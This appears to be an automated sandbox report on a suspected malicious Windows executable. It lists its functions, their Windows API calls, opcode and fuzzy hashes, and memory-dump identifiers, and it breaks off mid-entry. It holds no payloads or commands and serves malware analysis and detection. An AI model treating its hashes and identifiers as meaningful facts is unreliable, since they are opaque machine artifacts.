                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                      Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                      Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                      Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 004503C8
                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Proc$Parent
                                      • String ID:
                                      • API String ID: 2351499541-0
                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                      Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                      • TranslateMessage.USER32(?), ref: 00442B01
                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchTranslate
                                      • String ID:
                                      • API String ID: 1795658109-0
                                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                      Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                      • GetCaretPos.USER32(?), ref: 004743B2
                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                      • GetForegroundWindow.USER32 ref: 004743EE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                      Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                      • _wcslen.LIBCMT ref: 00449519
                                      • _wcslen.LIBCMT ref: 00449526
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 2886238975-0
                                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                      Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __setmode$DebugOutputString_fprintf
                                      • String ID:
                                      • API String ID: 1792727568-0
                                      • Opcode ID: 2ec4448ab620bd7111f1807c33ee2a8c448127a9493604cdb80b912c51ee9b21
                                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                      • Opcode Fuzzy Hash: 2ec4448ab620bd7111f1807c33ee2a8c448127a9493604cdb80b912c51ee9b21
                                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                      Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: 08dcd2e5386a87cad46f4510cadd52763bceb9adb2884f8b63ead6fb3e0fdbd4
                                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                      • Opcode Fuzzy Hash: 08dcd2e5386a87cad46f4510cadd52763bceb9adb2884f8b63ead6fb3e0fdbd4
                                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                      Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                      Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                      • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                      • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                      • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                      Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$CreateMessageObjectSendShowStock
                                      • String ID:
                                      • API String ID: 1358664141-0
                                      • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                      • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                      • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                      • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                      Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0043392E
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • __wsplitpath.LIBCMT ref: 00433950
                                      • __wcsicoll.LIBCMT ref: 00433974
                                      • __wcsicoll.LIBCMT ref: 0043398A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                      • String ID:
                                      • API String ID: 1187119602-0
                                      • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                      • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                      • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                      • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                      Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                      • String ID:
                                      • API String ID: 1597257046-0
                                      • Opcode ID: 04a679fbaeff4c9525a58c723f74a4d3bafbdcfc7a5173346b3e81de9db1ca75
                                      • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                      • Opcode Fuzzy Hash: 04a679fbaeff4c9525a58c723f74a4d3bafbdcfc7a5173346b3e81de9db1ca75
                                      • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                      Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                      • String ID:
                                      • API String ID: 237123855-0
                                      • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                      • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                      • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                      • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                      Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
